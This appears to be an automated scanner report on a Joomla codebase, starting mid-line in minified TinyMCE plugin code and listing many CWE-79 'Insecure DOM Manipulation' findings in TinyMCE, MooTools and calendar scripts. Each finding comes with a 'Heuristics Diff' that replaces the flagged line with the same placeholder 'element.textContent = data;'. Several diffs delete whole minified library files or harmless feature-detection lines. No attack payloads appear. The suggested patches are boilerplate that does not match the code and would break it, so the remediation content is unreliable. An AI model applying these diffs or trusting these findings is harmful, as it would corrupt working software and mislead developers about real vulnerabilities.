c=this.editor,g,h=[],f=this._getParentLayer(c.selection.getNode()),e=-1,k=-1,b;b=[];tinymce.walk(c.getBody(),function(d){if(d.nodeType==1&&/^(absolute|relative|static)$/i.test(d.style.position)){b.push(d)}},"childNodes");for(g=0;g<b.length;g++){h[g]=b[g].style.zIndex?parseInt(b[g].style.zIndex):0;if(e<0&&b[g]==f){e=g}}if(j<0){for(g=0;g<h.length;g++){if(h[g]<h[e]){k=g;break}}if(k>-1){b[e].style.zIndex=h[k];b[k].style.zIndex=h[e]}else{if(h[e]>0){b[e].style.zIndex=h[e]-1}}}else{for(g=0;g<h.length;g++){if(h[g]>h[e]){k=g;break}}if(k>-1){b[e].style.zIndex=h[k];b[k].style.zIndex=h[e]}else{b[e].style.zIndex=h[e]+1}}c.execCommand("mceRepaint")},_getParentLayer:function(b){return this.editor.dom.getParent(b,function(c){return c.nodeType==1&&/^(absolute|relative|static)$/i.test(c.style.position)})},_insertLayer:function(){var c=this.editor,e=c.dom,d=e.getPos(e.getParent(c.selection.getNode(),"*")),b=c.getBody();c.dom.add(b,"div",{style:{position:"absolute",left:d.x,top:(d.y>20?d.y:20),width:100,height:100},"class":"mceItemVisualAid mceItemLayer"},c.selection.getContent()||c.getLang("layer.content"));if(tinymce.isIE){e.setHTML(b,b.innerHTML)}},_toggleAbsolute:function(){var b=this.editor,c=this._getParentLayer(b.selection.getNode());if(!c){c=b.dom.getParent(b.selection.getNode(),"DIV,P,IMG")}if(c){if(c.style.position.toLowerCase()=="absolute"){b.dom.setStyles(c,{position:"",left:"",top:"",width:"",height:""});b.dom.removeClass(c,"mceItemVisualAid");b.dom.removeClass(c,"mceItemLayer")}else{if(c.style.left==""){c.style.left=20+"px"}if(c.style.top==""){c.style.top=20+"px"}if(c.style.width==""){c.style.width=c.width?(c.width+"px"):"100px"}if(c.style.height==""){c.style.height=c.height?(c.height+"px"):"100px"}c.style.position="absolute";b.dom.setAttrib(c,"data-mce-style","");b.addVisual(b.getBody())}b.execCommand("mceRepaint");b.nodeChanged()}}});tinymce.PluginManager.add("layer",tinymce.plugins.Layer)})();
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L80

Insecure DOM Manipulation (XSS) in media.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/media/js/media.js:80
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- get('audio_altsource2_filebrowser').innerHTML = getBrowserHTML('audio_filebrowser_altsource2','audio_altsource2','media','media');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L87

Insecure DOM Manipulation (XSS) in media.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/media/js/media.js:87
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- get("linklistcontainer").innerHTML = html;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L69

Insecure DOM Manipulation (XSS) in props.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/style/js/props.js:69
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('text_color_pickcontainer').innerHTML = getColorPickerHTML('text_color_pick','text_color');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L63

Insecure DOM Manipulation (XSS) in template.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/template/js/template.js:63
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- d.body.innerHTML = this.templateHTML = this.getFileContents(u);
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L56

Insecure DOM Manipulation (XSS) in about.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/about.js:56
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- tcont.innerHTML = html;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L510

Insecure DOM Manipulation (XSS) in calendar-uncompressed.js

CWE-79
File Location: media/system/js/calendar-uncompressed.js:510
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- el._current = el.innerHTML;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L688

Insecure DOM Manipulation (XSS) in calendar-uncompressed.js

CWE-79
File Location: media/system/js/calendar-uncompressed.js:688
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- el.innerHTML = newval;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L809

Insecure DOM Manipulation (XSS) in calendar-uncompressed.js

CWE-79
File Location: media/system/js/calendar-uncompressed.js:809
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- cell.innerHTML = Calendar._TT["WK"];
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L910

Insecure DOM Manipulation (XSS) in calendar-uncompressed.js

CWE-79
File Location: media/system/js/calendar-uncompressed.js:910
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- else if (/am/i.test(AP.innerHTML) && h == 12)
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L2154

Insecure DOM Manipulation (XSS) in mootools-core-uncompressed.js

CWE-79
File Location: media/system/js/mootools-core-uncompressed.js:2154
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- testNode.innerHTML = '<a name="'+ id +'"></a><b id="'+ id +'"></b>';
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L173

Insecure DOM Manipulation (XSS) in mootools-core.js

CWE-79
File Location: media/system/js/mootools-core.js:173
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- var q,u,y,z,t;var x,v="slick_uniqueid";var c=w.createElement("div");var n=w.body||w.getElementsByTagName("body")[0]||A;n.appendChild(c);try{c.innerHTML='<a id="'+v+'"></a>';
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L335

Insecure DOM Manipulation (XSS) in mootools-core.js

CWE-79
File Location: media/system/js/mootools-core.js:335
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- }};var t=document.createElement("div");t.innerHTML="<nav></nav>";var a=(t.childNodes.length==1);if(!a){var s="abbr article aside audio canvas datalist details figcaption figure footer header hgroup mark meter nav output progress section summary time video".split(" "),b=document.createDocumentFragment(),u=s.length;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L337

Insecure DOM Manipulation (XSS) in mootools-core.js

CWE-79
File Location: media/system/js/mootools-core.js:337
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- });var c=document.createElement("tr"),o="<td></td>";c.innerHTML=o;var y=(c.innerHTML==o);c=null;if(!g||!y||!a){Element.Properties.html.set=(function(l){var e={table:[1,"<table>","</table>"],select:[1,"<select>","</select>"],tbody:[2,"<table><tbody>","</tbody></table>"],tr:[3,"<table><tbody><tr>","</tr></tbody></table>"]};
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L339

Insecure DOM Manipulation (XSS) in mootools-core.js

CWE-79
File Location: media/system/js/mootools-core.js:339
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- if(!a){b.appendChild(G);}G.innerHTML=[E[1],D,E[2]].flatten().join("");while(H--){F=F.firstChild;}this.empty().adopt(F.childNodes);if(!a){b.removeChild(G);
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L180

Insecure DOM Manipulation (XSS) in hide.js

CWE-79
File Location: templates/beez_20/javascript/hide.js:180
Security Score:
73 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.id('bild').innerHTML = rightclose;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L180

Insecure DOM Manipulation (XSS) in update.js

CWE-79
File Location: media/com_joomlaupdate/update.js:180
Security Score:
72 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('extbytesin').innerHTML = new Number(joomlaupdate_stat_inbytes).format();
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L182

Insecure DOM Manipulation (XSS) in update.js

CWE-79
File Location: media/com_joomlaupdate/update.js:182
Security Score:
72 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.getElementById('extfiles').innerHTML = new Number(joomlaupdate_stat_files).format();
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L1

Insecure DOM Manipulation (XSS) in editor_plugin.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/plugins/lists/editor_plugin.js:1
Security Score:
72 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- (function(){var e=tinymce.each,r=tinymce.dom.Event,g;function p(t,s){while(t&&(t.nodeType===8||(t.nodeType===3&&/^[ \t\n\r]*$/.test(t.nodeValue)))){t=s(t)}return t}function b(s){return p(s,function(t){return t.previousSibling})}function i(s){return p(s,function(t){return t.nextSibling})}function d(s,u,t){return s.dom.getParent(u,function(v){return tinymce.inArray(t,v)!==-1})}function n(s){return s&&(s.tagName==="OL"||s.tagName==="UL")}function c(u,v){var t,w,s;t=b(u.lastChild);while(n(t)){w=t;t=b(w.previousSibling)}if(w){s=v.create("li",{style:"list-style-type: none;"});v.split(u,w);v.insertAfter(s,w);s.appendChild(w);s.appendChild(w);u=s.previousSibling}return u}function m(t,s,u){t=a(t,s,u);return o(t,s,u)}function a(u,s,v){var t=b(u.previousSibling);if(t){return h(t,u,s?t:false,v)}else{return u}}function o(u,t,v){var s=i(u.nextSibling);if(s){return h(u,s,t?s:false,v)}else{return u}}function h(u,s,t,v){if(l(u,s,!!t,v)){return f(u,s,t)}else{if(u&&u.tagName==="LI"&&n(s)){u.appendChild(s)}}return s}function l(u,t,s,v){if(!u||!t){return false}else{if(u.tagName==="LI"&&t.tagName==="LI"){return t.style.listStyleType==="none"||j(t)}else{if(n(u)){return(u.tagName===t.tagName&&(s||u.style.listStyleType===t.style.listStyleType))||q(t)}else{return v&&u.tagName==="P"&&t.tagName==="P"}}}}function q(t){var s=i(t.firstChild),u=b(t.lastChild);return s&&u&&n(t)&&s===u&&(n(s)||s.style.listStyleType==="none"||j(s))}function j(u){var t=i(u.firstChild),s=b(u.lastChild);return t&&s&&t===s&&n(t)}function f(w,v,s){var u=b(w.lastChild),t=i(v.firstChild);if(w.tagName==="P"){w.appendChild(w.ownerDocument.createElement("br"))}while(v.firstChild){w.appendChild(v.firstChild)}if(s){w.style.listStyleType=s.style.listStyleType}v.parentNode.removeChild(v);h(u,t,false);return w}function k(t,u){var s;if(!u.is(t,"li,ol,ul")){s=u.getParent(t,"li");if(s){t=s}}return t}tinymce.create("tinymce.plugins.Lists",{init:function(y){var v="TABBING";var s="EMPTY";var J="ESCAPE";var z="PARAGRAPH";var N="UNKNOWN";var x=N;function E(U){return U.keyCode===tinymce.VK.TAB&&!(U.altKey||U.ctrlKey)&&(y.queryCommandState("InsertUnorderedList")||y.queryCommandState("InsertOrderedList"))}function w(){var U=B();var W=U.parentNode.parentNode;var V=U.parentNode.lastChild===U;return V&&!t(W)&&P(U)}function t(U){if(n(U)){return U.parentNode&&U.parentNode.tagName==="LI"}else{return U.tagName==="LI"}}function F(){return y.selection.isCollapsed()&&P(B())}function B(){var U=y.selection.getStart();return((U.tagName=="BR"||U.tagName=="")&&U.parentNode.tagName=="LI")?U.parentNode:U}function P(U){var V=U.childNodes.length;if(U.tagName==="LI"){return V==0?true:V==1&&(U.firstChild.tagName==""||U.firstChild.tagName=="BR"||H(U))}return false}function H(U){var V=tinymce.grep(U.parentNode.childNodes,function(Y){return Y.tagName=="LI"});var W=U==V[V.length-1];var X=U.firstChild;return tinymce.isIE9&&W&&(X.nodeValue==String.fromCharCode(160)||X.nodeValue==String.fromCharCode(32))}function T(U){return U.keyCode===tinymce.VK.ENTER}function A(U){return T(U)&&!U.shiftKey}function M(U){if(E(U)){return v}else{if(A(U)&&w()){return N}else{if(A(U)&&F()){return s}else{return N}}}}function D(U,V){if(x==v||x==s||tinymce.isGecko&&x==J){r.cancel(V)}}function C(){var U=y.selection.getRng(true);var V=U.startContainer;if(V.nodeType==3){var W=V.nodeValue;if(tinymce.isIE9&&W.length>1&&W.charCodeAt(W.length-1)==32){return(U.endOffset==W.length-1)}else{return(U.endOffset==W.length)}}else{if(V.nodeType==1){return U.endOffset==V.childNodes.length}}return false}function I(){var W=y.selection.getNode();var V="h1,h2,h3,h4,h5,h6,p,div";var U=y.dom.is(W,V)&&W.parentNode.tagName==="LI"&&W.parentNode.lastChild===W;return y.selection.isCollapsed()&&U&&C()}function K(W,Y){if(A(Y)&&I()){var X=W.selection.getNode();var V=W.dom.create("li");var U=W.dom.getParent(X,"li");W.dom.insertAfter(V,U);if(tinymce.isIE6||tinymce.isIE7||tinyMCE.isIE8){W.selection.setCursorLocation(V,1)}else{W.selection.setCursorLocation(V,0)}Y.preventDefault()}}function u(X,Z){var ac;if(!tinymce.isGecko){return}var V=X.selection.getStart();if(Z.keyCode!=tinymce.VK.BACKSPACE||V.tagName!=="IMG"){return}function W(ag){var ah=ag.firstChild;var af=null;do{if(!ah){break}if(ah.tagName==="LI"){af=ah}}while(ah=ah.nextSibling);return af}function ae(ag,af){while(ag.childNodes.length>0){af.appendChild(ag.childNodes[0])}}ac=V.parentNode.previousSibling;if(!ac){return}var aa;if(ac.tagName==="UL"||ac.tagName==="OL"){aa=ac}else{if(ac.previousSibling&&(ac.previousSibling.tagName==="UL"||ac.previousSibling.tagName==="OL")){aa=ac.previousSibling}else{return}}var ad=W(aa);var U=X.dom.createRng();U.setStart(ad,1);U.setEnd(ad,1);X.selection.setRng(U);X.selection.collapse(true);var Y=X.selection.getBookmark();var ab=V.parentNode.cloneNode(true);if(ab.tagName==="P"||ab.tagName==="DIV"){ae(ab,ad)}else{ad.appendChild(ab)}V.parentNode.parentNode.removeChild(V.parentNode);X.selection.moveToBookmark(Y)}function G(U){var V=y.dom.getParent(U,"ol,ul");if(V!=null){var W=V.lastChild;y.selection.setCursorLocation(W,0)}}this.ed=y;y.addCommand("Indent",this.indent,this);y.addCommand("Outdent",this.outdent,this);y.addCommand("InsertUnorderedList",function(){this.applyList("UL","OL")},this);y.addCommand("InsertOrderedList",function(){this.applyList("OL","UL")},this);y.onInit.add(function(){y.editorCommands.addCommands({outdent:function(){var V=y.selection,W=y.dom;function U(X){X=W.getParent(X,W.isBlock);return X&&(parseInt(y.dom.getStyle(X,"margin-left")||0,10)+parseInt(y.dom.getStyle(X,"padding-left")||0,10))>0}return U(V.getStart())||U(V.getEnd())||y.queryCommandState("InsertOrderedList")||y.queryCommandState("InsertUnorderedList")}},"state")});y.onKeyUp.add(function(V,W){if(x==v){V.execCommand(W.shiftKey?"Outdent":"Indent",true,null);x=N;return r.cancel(W)}else{if(x==s){var U=B();var Y=V.settings.list_outdent_on_enter===true||W.shiftKey;V.execCommand(Y?"Outdent":"Indent",true,null);if(tinymce.isIE){G(U)}return r.cancel(W)}else{if(x==J){if(tinymce.isIE6||tinymce.isIE7||tinymce.isIE8){var X=V.getDoc().createTextNode("\uFEFF");V.selection.getNode().appendChild(X)}else{if(tinymce.isIE9||tinymce.isGecko){V.execCommand("Outdent");return r.cancel(W)}}}}}});function L(V,U){var W=y.getDoc().createTextNode("\uFEFF");V.insertBefore(W,U);y.selection.setCursorLocation(W,0);y.execCommand("mceRepaint")}function R(V,X){if(T(X)){var U=B();if(U){var W=U.parentNode;var Y=W&&W.parentNode;if(Y&&Y.nodeName=="LI"&&Y.firstChild==W&&U==W.firstChild){L(Y,W)}}}}function S(V,X){if(T(X)){var U=B();if(V.dom.select("ul li",U).length===1){var W=U.firstChild;L(U,W)}}}function Q(V,Z){function W(ad,aa){var ac=[];var ae=new tinymce.dom.TreeWalker(aa,ad);for(var ab=ae.current();ab;ab=ae.next()){if(V.dom.is(ab,"ol,ul,li")){ac.push(ab)}}return ac}if(Z.keyCode==tinymce.VK.BACKSPACE){var U=B();if(U){var Y=V.dom.getParent(U,"ol,ul");if(Y&&Y.firstChild===U){var X=W(Y,U);V.execCommand("Outdent",false,X);V.undoManager.add();return r.cancel(Z)}}}}function O(V,X){var U=B();if(X.keyCode===tinymce.VK.BACKSPACE&&V.dom.is(U,"li")&&U.parentNode.firstChild!==U){if(V.dom.select("ul,ol",U).length===1){var Z=U.previousSibling;V.dom.remove(V.dom.select("br",U));V.dom.remove(U,true);var W=tinymce.grep(Z.childNodes,function(aa){return aa.nodeType===3});if(W.length===1){var Y=W[0];V.selection.setCursorLocation(Y,Y.length)}V.undoManager.add();return r.cancel(X)}}}y.onKeyDown.add(function(U,V){x=M(V)});y.onKeyDown.add(D);y.onKeyDown.add(u);y.onKeyDown.add(K);if(tinymce.isGecko){y.onKeyUp.add(R)}if(tinymce.isIE8){y.onKeyUp.add(S)}if(tinymce.isGecko||tinymce.isWebKit){y.onKeyDown.add(Q)}if(tinymce.isWebKit){y.onKeyDown.add(O)}},applyList:function(y,v){var C=this,z=C.ed,I=z.dom,s=[],H=false,u=false,w=false,B,G=z.selection.getSelectedBlocks();function E(t){if(t&&t.tagName==="BR"){I.remove(t)}}function F(M){var N=I.create(y),t;function L(O){if(O.style.marginLeft||O.style.paddingLeft){C.adjustPaddingFunction(false)(O)}}if(M.tagName==="LI"){}else{if(M.tagName==="P"||M.tagName==="DIV"||M.tagName==="BODY"){K(M,function(P,O){J(P,O,M.tagName==="BODY"?null:P.parentNode);t=P.parentNode;L(t);E(O)});if(t){if(t.tagName==="LI"&&(M.tagName==="P"||G.length>1)){I.split(t.parentNode.parentNode,t.parentNode)}m(t.parentNode,true)}return}else{t=I.create("li");I.insertAfter(t,M);t.appendChild(M);L(M);M=t}}I.insertAfter(N,M);N.appendChild(M);m(N,true);s.push(M)}function J(P,L,N){var t,O=P,M;while(!I.isBlock(P.parentNode)&&P.parentNode!==I.getRoot()){P=I.split(P.parentNode,P.previousSibling);P=P.nextSibling;O=P}if(N){t=N.cloneNode(true);P.parentNode.insertBefore(t,P);while(t.firstChild){I.remove(t.firstChild)}t=I.rename(t,"li")}else{t=I.create("li");P.parentNode.insertBefore(t,P)}while(O&&O!=L){M=O.nextSibling;t.appendChild(O);O=M}if(t.childNodes.length===0){t.innerHTML='<br _mce_bogus="1" />'}F(t)}function K(Q,T){var N,R,O=3,L=1,t="br,ul,ol,p,div,h1,h2,h3,h4,h5,h6,table,blockquote,address,pre,form,center,dl";function P(X,U){var V=I.createRng(),W;g.keep=true;z.selection.moveToBookmark(g);g.keep=false;W=z.selection.getRng(true);if(!U){U=X.parentNode.lastChild}V.setStartBefore(X);V.setEndAfter(U);return !(V.compareBoundaryPoints(O,W)>0||V.compareBoundaryPoints(L,W)<=0)}function S(U){if(U.nextSibling){return U.nextSibling}if(!I.isBlock(U.parentNode)&&U.parentNode!==I.getRoot()){return S(U.parentNode)}}N=Q.firstChild;var M=false;e(I.select(t,Q),function(U){if(U.hasAttribute&&U.hasAttribute("_mce_bogus")){return true}if(P(N,U)){I.addClass(U,"_mce_tagged_br");N=S(U)}});M=(N&&P(N,undefined));N=Q.firstChild;e(I.select(t,Q),function(V){var U=S(V);if(V.hasAttribute&&V.hasAttribute("_mce_bogus")){return true}if(I.hasClass(V,"_mce_tagged_br")){T(N,V,R);R=null}else{R=V}N=U});if(M){T(N,undefined,R)}}function D(t){K(t,function(M,L,N){J(M,L);E(L);E(N)})}function A(t){if(tinymce.inArray(s,t)!==-1){return}if(t.parentNode.tagName===v){I.split(t.parentNode,t);F(t);o(t.parentNode,false)}s.push(t)}function x(M){var O,N,L,t;if(tinymce.inArray(s,M)!==-1){return}M=c(M,I);while(I.is(M.parentNode,"ol,ul,li")){I.split(M.parentNode,M)}s.push(M);M=I.rename(M,"p");L=m(M,false,z.settings.force_br_newlines);if(L===M){O=M.firstChild;while(O){if(I.isBlock(O)){O=I.split(O.parentNode,O);t=true;N=O.nextSibling&&O.nextSibling.firstChild}else{N=O.nextSibling;if(t&&O.tagName==="BR"){I.remove(O)}t=false}O=N}}}e(G,function(t){t=k(t,I);if(t.tagName===v||(t.tagName==="LI"&&t.parentNode.tagName===v)){u=true}else{if(t.tagName===y||(t.tagName==="LI"&&t.parentNode.tagName===y)){H=true}else{w=true}}});if(w&&!H||u||G.length===0){B={LI:A,H1:F,H2:F,H3:F,H4:F,H5:F,H6:F,P:F,BODY:F,DIV:G.length>1?F:D,defaultAction:D,elements:this.selectedBlocks()}}else{B={defaultAction:x,elements:this.selectedBlocks(),processEvenIfEmpty:true}}this.process(B)},indent:function(){var u=this.ed,w=u.dom,x=[];function s(z){var y=w.create("li",{style:"list-style-type: none;"});w.insertAfter(y,z);return y}function t(B){var y=s(B),D=w.getParent(B,"ol,ul"),C=D.tagName,E=w.getStyle(D,"list-style-type"),A={},z;if(E!==""){A.style="list-style-type: "+E+";"}z=w.create(C,A);y.appendChild(z);return z}function v(z){if(!d(u,z,x)){z=c(z,w);var y=t(z);y.appendChild(z);m(y.parentNode,false);m(y,false);x.push(z)}}this.process({LI:v,defaultAction:this.adjustPaddingFunction(true),elements:this.selectedBlocks()})},outdent:function(y,x){var w=this,u=w.ed,z=u.dom,s=[];function A(t){var C,B,D;if(!d(u,t,s)){if(z.getStyle(t,"margin-left")!==""||z.getStyle(t,"padding-left")!==""){return w.adjustPaddingFunction(false)(t)}D=z.getStyle(t,"text-align",true);if(D==="center"||D==="right"){z.setStyle(t,"text-align","left");return}t=c(t,z);C=t.parentNode;B=t.parentNode.parentNode;if(B.tagName==="P"){z.split(B,t.parentNode)}else{z.split(C,t);if(B.tagName==="LI"){z.split(B,t)}else{if(!z.is(B,"ol,ul")){z.rename(t,"p")}}}s.push(t)}}var v=x&&tinymce.is(x,"array")?x:this.selectedBlocks();this.process({LI:A,defaultAction:this.adjustPaddingFunction(false),elements:v});e(s,m)},process:function(y){var F=this,w=F.ed.selection,z=F.ed.dom,E,u;function B(t){var s=tinymce.grep(t.childNodes,function(H){return !(H.nodeName==="BR"||H.nodeName==="SPAN"&&z.getAttrib(H,"data-mce-type")=="bookmark"||H.nodeType==3&&(H.nodeValue==String.fromCharCode(160)||H.nodeValue==""))});return s.length===0}function x(s){z.removeClass(s,"_mce_act_on");if(!s||s.nodeType!==1||!y.processEvenIfEmpty&&E.length>1&&B(s)){return}s=k(s,z);var t=y[s.tagName];if(!t){t=y.defaultAction}t(s)}function v(s){F.splitSafeEach(s.childNodes,x)}function C(s,t){return t>=0&&s.hasChildNodes()&&t<s.childNodes.length&&s.childNodes[t].tagName==="BR"}function D(){var t=w.getNode();var s=z.getParent(t,"td");return s!==null}E=y.elements;u=w.getRng(true);if(!u.collapsed){if(C(u.endContainer,u.endOffset-1)){u.setEnd(u.endContainer,u.endOffset-1);w.setRng(u)}if(C(u.startContainer,u.startOffset)){u.setStart(u.startContainer,u.startOffset+1);w.setRng(u)}}if(tinymce.isIE8){var G=F.ed.selection.getNode();if(G.tagName==="LI"&&!(G.parentNode.lastChild===G)){var A=F.ed.getDoc().createTextNode("\uFEFF");G.appendChild(A)}}g=w.getBookmark();y.OL=y.UL=v;F.splitSafeEach(E,x);w.moveToBookmark(g);g=null;if(!D()){F.ed.execCommand("mceRepaint")}},splitSafeEach:function(t,s){if(tinymce.isGecko&&(/Firefox\/[12]\.[0-9]/.test(navigator.userAgent)||/Firefox\/3\.[0-4]/.test(navigator.userAgent))){this.classBasedEach(t,s)}else{e(t,s)}},classBasedEach:function(v,u){var w=this.ed.dom,s,t;e(v,function(x){w.addClass(x,"_mce_act_on")});s=w.select("._mce_act_on");while(s.length>0){t=s.shift();w.removeClass(t,"_mce_act_on");u(t);s=w.select("._mce_act_on")}},adjustPaddingFunction:function(u){var s,v,t=this.ed;s=t.settings.indentation;v=/[a-z%]+/i.exec(s);s=parseInt(s,10);return function(w){var y,x;y=parseInt(t.dom.getStyle(w,"margin-left")||0,10)+parseInt(t.dom.getStyle(w,"padding-left")||0,10);if(u){x=y+s}else{x=y-s}t.dom.setStyle(w,"padding-left","");t.dom.setStyle(w,"margin-left",x>0?x+v:"")}},selectedBlocks:function(){var s=this.ed;var t=s.selection.getSelectedBlocks();return t.length==0?[s.dom.getRoot()]:t},getInfo:function(){return{longname:"Lists",author:"Moxiecode Systems AB",authorurl:"http://tinymce.moxiecode.com",infourl:"http://wiki.moxiecode.com/index.php/TinyMCE:Plugins/lists",version:tinymce.majorVersion+"."+tinymce.minorVersion}}});tinymce.PluginManager.add("lists",tinymce.plugins.Lists)}());
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L357

Insecure DOM Manipulation (XSS) in charmap.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/charmap.js:357
Security Score:
72 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- elmV.innerHTML = '&' + codeA;
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L8

Insecure DOM Manipulation (XSS) in link.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/themes/advanced/js/link.js:8
Security Score:
72 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- document.write('<script language="javascript" type="text/javascript" src="' + tinyMCEPopup.editor.documentBaseURI.toAbsolute(url) + '"></script>');
+ element.textContent = data; // Or use DOMPurify to sanitize HTML output
L5

Insecure DOM Manipulation (XSS) in tiny_mce_popup.js

CWE-79
File Location: media/editors/tinymce/jscripts/tiny_mce/tiny_mce_popup.js:5
Security Score:
72 / 100
Needs Audit

Rule Engine Warning

Detected insecure pattern matching known vulnerability signatures. Medium Confidence (Fuzzy matcher overlap - minor review required). Please apply remediation steps matching the recommended patch format below.

Heuristics Diff
- var tinymce=null,tinyMCEPopup,tinyMCE;tinyMCEPopup={init:function(){var b=this,a,c;a=b.getWin();tinymce=a.tinymce;tinyMCE=a.tinyMCE;b.editor=tinymce.EditorManager.activeEditor;b.params=b.editor.windowManager.params;b.features=b.editor.windowManager.features;b.dom=b.editor.windowManager.createInstance("tinymce.dom.DOMUtils",document,{ownEvents:true,proxy:tinyMCEPopup._eventProxy});b.dom.bind(window,"ready",b._onDOMLoaded,b);if(b.features.popup_css!==false){b.dom.loadCSS(b.features.popup_css||b.editor.settings.popup_css)}b.listeners=[];b.onInit={add:function(e,d){b.listeners.push({func:e,scope:d})}};b.isWindow=!b.getWindowArg("mce_inline");b.id=b.getWindowArg("mce_window_id");b.editor.windowManager.onOpen.dispatch(b.editor.windowManager,window)},getWin:function(){return(!window.frameElement&&window.dialogArguments)||opener||parent||top},getWindowArg:function(c,b){var a=this.params[c];return tinymce.is(a)?a:b},getParam:function(b,a){return this.editor.getParam(b,a)},getLang:function(b,a){return this.editor.getLang(b,a)},execCommand:function(d,c,e,b){b=b||{};b.skip_focus=1;this.restoreSelection();return this.editor.execCommand(d,c,e,b)},resizeToInnerSize:function(){var a=this;setTimeout(function(){var 